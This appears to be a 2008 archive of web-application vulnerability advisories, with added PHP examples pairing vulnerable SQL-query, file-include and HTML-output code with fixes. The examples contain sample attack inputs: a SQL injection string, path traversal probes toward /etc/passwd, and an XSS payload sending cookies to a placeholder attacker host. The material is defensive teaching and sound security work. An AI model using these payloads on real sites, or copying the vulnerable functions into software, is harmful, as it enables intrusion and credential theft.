Archive for February, 2008

Joomla astatsPRO Component SQL Injection

February 22nd, 2008

Application: Joomla astatsPRO Component
Affected Version: 1.0.1 and other versions.
Vendor’s URL: Joomla astatsPRO Component
Bug Type: SQL Injection
Risk Level: Medium

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, SQL Injection

PunBB Password Change and XSS

February 22nd, 2008

Application: PunBB
Affected Version: 1.2.16 and other versions.
Vendor’s URL: http://www.punbb.org/
Bug Type: Cross Site Scripting
Risk Level: Medium

Solution:
Update to version 1.2.17.

Cross Site Scripting, Discussion Boards

Joomla hwdVideoShare Component SQL Injection

February 22nd, 2008

Application: Joomla hwdVideoShare Component
Affected Version: 1.1.3 and other versions.
Vendor’s URL: Joomla hwdVideoShare Component
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, SQL Injection

WordPress WP Photo Album Plugin “photo” SQL Injection

February 22nd, 2008

Application: WordPress WP Photo Album Plugin
Affected Version: 1.0 and prior versions.
Vendor’s URL: http://me.mywebsight.ws/web/wppa/
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Update to version 1.1.

Content Management, SQL Injection

AuraCMS “albums” SQL Injection Vulnerability

February 22nd, 2008

Application: AuraCMS
Affected Version: 2.2.1 and other versions.
Vendor’s URL: http://www.auracms.org/
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Apply the “Update Gallery” patch.

Content Management, SQL Injection

Drupal Header Image Module Security Bypass Vulnerability

February 22nd, 2008

Application: Drupal Header Image Module
Affected Version: Prior to 5.x-1.1.
Vendor’s URL: http://drupal.org/project/headerimage
Bug Type: Access Bypass
Risk Level: Medium

Solution:
Update to version 5.x-1.1.

Access Bypass, Content Management

freePHPgallery “lang” Local File Inclusion

February 22nd, 2008

Application: freePHPgallery
Affected Version: 0.6 and other versions.
Vendor’s URL: http://freephpgallery.mbod.net/
Bug Type: File inclusion
Risk Level: Critical

Solution:
Update to version 0.6.1.

File Inclusion, Image Galleries

WordPress Search Unleashed Plugin Script Insertion

February 22nd, 2008

Application: WordPress Search Unleashed Plugin
Affected Version: 0.2.10.
Vendor’s URL: http://urbangiraffe.com/plugins/search-unleashed/
Bug Type: Cross Site Scripting
Risk Level: Medium

Solution:
Will be fixed in version 0.2.11.

Content Management, Cross Site Scripting

Joomla! mediaslide Component “albumnum” SQL Injection

February 22nd, 2008

Application: Joomla! mediaslide Component
Affected Version: 0.5 and other versions.
Vendor’s URL: http://www.kimwoodward.com/downloads.php
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, SQL Injection

Joomla! McQuiz Component “tid” SQL Injection

February 22nd, 2008

Application: Joomla! McQuiz Component
Affected Version: 0.9 Final and other versions.
Vendor’s URL: http://www.mcquizcomponent.com/
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, SQL Injection

Joomla! Quiz Component “tid” SQL Injection

February 22nd, 2008

Application: Joomla! Quiz Component
Affected Version: 0.81 and other versions.
Vendor’s URL: Joomla! Quiz Component
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, SQL Injection
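The "tid", "albumnum" and "photo" entries above share one shape: an integer record identifier is taken from the request and concatenated into a query, and the advice is to "edit the source code to ensure that input is properly sanitized". The script below is an added example written for this page, not code from any of the affected components or from Joomla! or WordPress; the table, rows and payload are constructed, and it runs against an in-memory SQLite database so it can be tried offline. It shows the vulnerable pattern next to the two fixes that advice usually means: cast the identifier to an integer, or bind it as a query parameter.

```php
<?php
// Added example, not from the advisories above or from the affected projects.
// Demonstrates the integer-ID injection pattern ("tid", "albumnum", "photo")
// and the fixes behind "ensure that input is properly sanitized".
// Schema, rows and payload below are constructed for the demo.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE quiz (tid INTEGER PRIMARY KEY, title TEXT, secret TEXT)');
$db->exec("INSERT INTO quiz VALUES (1, 'public quiz', NULL)");
$db->exec("INSERT INTO quiz VALUES (2, 'private quiz', 'answer key')");

// Vulnerable pattern: the request parameter is interpolated straight into SQL,
// so "1 OR 1=1" rewrites the WHERE clause and returns every row.
function quiz_vulnerable(PDO $db, string $tid): array
{
    $sql = "SELECT tid, title, secret FROM quiz WHERE tid = $tid";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fix 1: the parameter is a record number, so force it to an integer before
// it touches the query. Non-numeric input becomes 0 (or its leading digits)
// and can no longer carry SQL syntax.
function quiz_intcast(PDO $db, string $tid): array
{
    $id = (int) $tid;
    return $db->query("SELECT tid, title, secret FROM quiz WHERE tid = $id")
              ->fetchAll(PDO::FETCH_ASSOC);
}

// Fix 2: bind the value as a statement parameter. The driver sends it as data,
// so it is compared as a value and never parsed as SQL.
function quiz_prepared(PDO $db, string $tid): array
{
    $stmt = $db->prepare('SELECT tid, title, secret FROM quiz WHERE tid = ?');
    $stmt->execute([$tid]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$payload = '1 OR 1=1';   // what an attacker sends as ?tid=

printf("vulnerable: %d row(s)\n", count(quiz_vulnerable($db, $payload)));
printf("int cast:   %d row(s)\n", count(quiz_intcast($db, $payload)));
printf("prepared:   %d row(s)\n", count(quiz_prepared($db, $payload)));
```

Run with `php sqli_demo.php`: the vulnerable query returns both rows, including the one holding the secret column, the cast version returns only record 1 (the leading digit of the payload), and the prepared statement returns nothing because the literal text "1 OR 1=1" matches no integer key. In the frameworks these components run on, the same fixes are `intval()` on the parameter (Joomla! 1.0) or `JRequest::getInt()` (Joomla! 1.5), and `$wpdb->prepare()` in WordPress; which of those a given component should use depends on its host version, which the advisories above do not state.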

WordPress DMSGuestbook Plugin Multiple Vulnerabilities

February 22nd, 2008

Application: WordPress DMSGuestbook Plugin
Affected Version: 1.8.0 and other versions.
Vendor’s URL: WordPress DMSGuestbook Plugin
Bug Type: Cross Site Scripting
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, Cross Site Scripting

WordPress MU File Upload and Security Bypass

February 22nd, 2008

Application: WordPress MU
Affected Version: 1.3.1 and other versions.
Vendor’s URL: http://mu.wordpress.org/
Bug Type: Access Bypass
Risk Level: Critical

Solution:
Update to version 1.3.2 or later.

Access Bypass, Content Management

WordPress XML-RPC Post Edit Vulnerability

February 22nd, 2008

Application: WordPress
Affected Version: 2.3.2 and other versions.
Vendor’s URL: http://wordpress.org/
Bug Type: Access Bypass
Risk Level: Medium

Solution:
Update to version 2.3.3.

Access Bypass, Content Management

Webmin / Usermin “search” XSS

February 22nd, 2008

Application: Webmin / Usermin
Affected Version: Webmin version 1.390, Usermin version 1.320 and other versions.
Vendor’s URL: http://www.webmin.com/
Bug Type: Cross Site Scripting
Risk Level: Medium

Solution:
Update to Webmin 1.400 or Usermin 1.330.

Cross Site Scripting

PacerCMS “last_module” PHP Code Execution

February 22nd, 2008

Application: PacerCMS
Affected Version: 0.6.2 and other versions.
Vendor’s URL: http://pacercms.sourceforge.net/
Bug Type: Remote Code Execution
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, Remote Command Execution
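The freePHPgallery "lang" entry above is a local file inclusion: a request parameter names a file that the script loads. The advisory for PacerCMS "last_module" does not say how that parameter reaches PHP execution, so treating it as the same include-by-name pattern is an assumption made here for illustration. The script below is an added example, not code from either project; the language directory and the allowed set are assumed. It shows why a raw parameter in an include path is fatal and the allowlist fix that "sanitizing" means for this bug class.

```php
<?php
// Added example, not from freePHPgallery or PacerCMS. Shows a file-inclusion
// sink driven by a request parameter and an allowlist-based fix.
// $base and the allowed language codes are assumed for the demo.

$base = __DIR__ . '/lang';   // assumed directory holding en.php, de.php, ...

// Vulnerable: the client-supplied string becomes part of an include path.
// "../../../../etc/passwd%00" walks out of $base (the NUL byte cut off the
// ".php" suffix on PHP releases of the period), and with allow_url_include
// on, a URL turns disclosure into remote code execution.
function lang_path_vulnerable(string $base, string $lang): string
{
    return $base . '/' . $lang . '.php';   // the path that would be include()d
}

// Fixed: the parameter selects from a fixed set of known files and the raw
// string never reaches the path. Anything else falls back to the default.
function lang_path_fixed(string $base, string $lang): string
{
    $allowed = ['en', 'de', 'fr'];   // assumed set of shipped language files
    if (!in_array($lang, $allowed, true)) {
        $lang = 'en';
    }
    return $base . '/' . $lang . '.php';
}

// Defence in depth where the set of files grows (a modules directory):
// reject separators and NUL outright, then resolve the candidate and require
// that it still lies under $base. Returns null for anything else.
function resolve_under(string $base, string $name): ?string
{
    if (strpbrk($name, "/\\\0") !== false) {
        return null;
    }
    $real     = realpath($base . '/' . $name . '.php');
    $baseReal = realpath($base);
    if ($real === false || $baseReal === false
        || strncmp($real, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed inputs: a legitimate value, traversal, traversal with NUL, a URL.
$probes = ['en', '../../../../etc/passwd', "../config\0", 'http://attacker.invalid/x'];
foreach ($probes as $p) {
    printf("%-28s vulnerable: %s\n%-28s fixed:      %s\n",
           str_replace("\0", '\0', $p), lang_path_vulnerable($base, $p),
           '', lang_path_fixed($base, $p));
}
```

The loop prints, for each probe, the path the vulnerable code would include next to the path the allowlist version uses; every hostile probe collapses to `lang/en.php`. `resolve_under()` is not exercised by the loop because it needs the files to exist on disk; it is the check to add when an allowlist cannot be kept in sync with a directory, and the `strpbrk` test is what stops the NUL and separator tricks before `realpath()` sees them.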

Joomla! XML-RPC / Blogger API Vulnerability

February 22nd, 2008

Application: Joomla! XML-RPC / Blogger API
Affected Version: 1.5 and other versions.
Vendor’s URL: http://www.joomla.org/
Bug Type: Manipulation of data
Risk Level: Medium

Solution:
Update to version 1.5.1.

Content Management

Simple Machines Forum SMF Shoutbox Mod Script Insertion

February 22nd, 2008

Application: Simple Machines Forum SMF
Affected Version: 1.16b and other versions.
Vendor’s URL: Simple Machines Forum SMF
Bug Type: Cross Site Scripting
Risk Level: Medium

Solution:
Edit the source code to ensure that input is properly sanitized.

Cross Site Scripting, Discussion Boards

Joomla! Rapid Recipe Component Two SQL Injection

February 22nd, 2008

Application: Joomla! Rapid Recipe Component
Affected Version: 1.6.5 and other versions.
Vendor’s URL: Joomla! Rapid Recipe Component
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Update to version 1.6.7.

Content Management, SQL Injection

WordPress WP-Footnotes Plugin “admin_panel.php” XSS

February 22nd, 2008

Application: WordPress WP-Footnotes Plugin
Affected Version: 2.2 and other versions.
Vendor’s URL: WordPress WP-Footnotes Plugin
Bug Type: Cross Site Scripting
Risk Level: Medium

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, Cross Site Scripting
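Several entries above (DMSGuestbook, the SMF Shoutbox mod, WP-Footnotes) are "script insertion" bugs whose only stated fix is to edit the source so input is sanitized. For a guestbook or shoutbox that stores visitor text and echoes it back, the edit that actually closes the hole is encoding at the point of output. The script below is an added example written for this page, not code from any of the affected projects; the stored entry is a constructed sample. It shows the same payload rendered unsafely and safely, in both element and attribute context.

```php
<?php
// Added example, not from DMSGuestbook, SMF, WP-Footnotes or the other
// advisories above. Demonstrates stored script insertion in a guestbook-style
// page and the output-encoding fix. The entry is constructed sample data.

$entry = [
    'name'    => 'visitor" onmouseover="alert(document.cookie)',
    'message' => '<script>location="http://attacker.invalid/?c="+document.cookie</script>',
];

// Vulnerable: stored text is dropped into HTML as-is, both between tags and
// inside a quoted attribute. The name payload closes the attribute and adds an
// event handler; the message payload is an ordinary script tag.
function render_vulnerable(array $e): string
{
    return '<div class="entry" title="' . $e['name'] . '">'
         . '<b>' . $e['name'] . '</b>: ' . $e['message'] . '</div>';
}

// Encode for HTML text and quoted-attribute context. ENT_QUOTES also converts
// the single quote, so the same helper is safe inside '...' attributes.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Fixed: every untrusted value goes through h() where it is written out.
// Stripping "<script>" on input is not a substitute: the name payload above
// contains no tag at all, only a quote and an attribute.
function render_fixed(array $e): string
{
    return '<div class="entry" title="' . h($e['name']) . '">'
         . '<b>' . h($e['name']) . '</b>: ' . h($e['message']) . '</div>';
}

echo render_vulnerable($entry), "\n\n";
echo render_fixed($entry), "\n";
```

The first line of output is live markup with a script element and an injected `onmouseover` handler; the second has every `<`, `>`, `"` and `'` replaced by an entity, so the browser shows the payload as text. Encoding belongs at output because the same stored value may later be emitted into a different context (a feed, an e-mail notification) where an input-time filter tuned for HTML would be wrong.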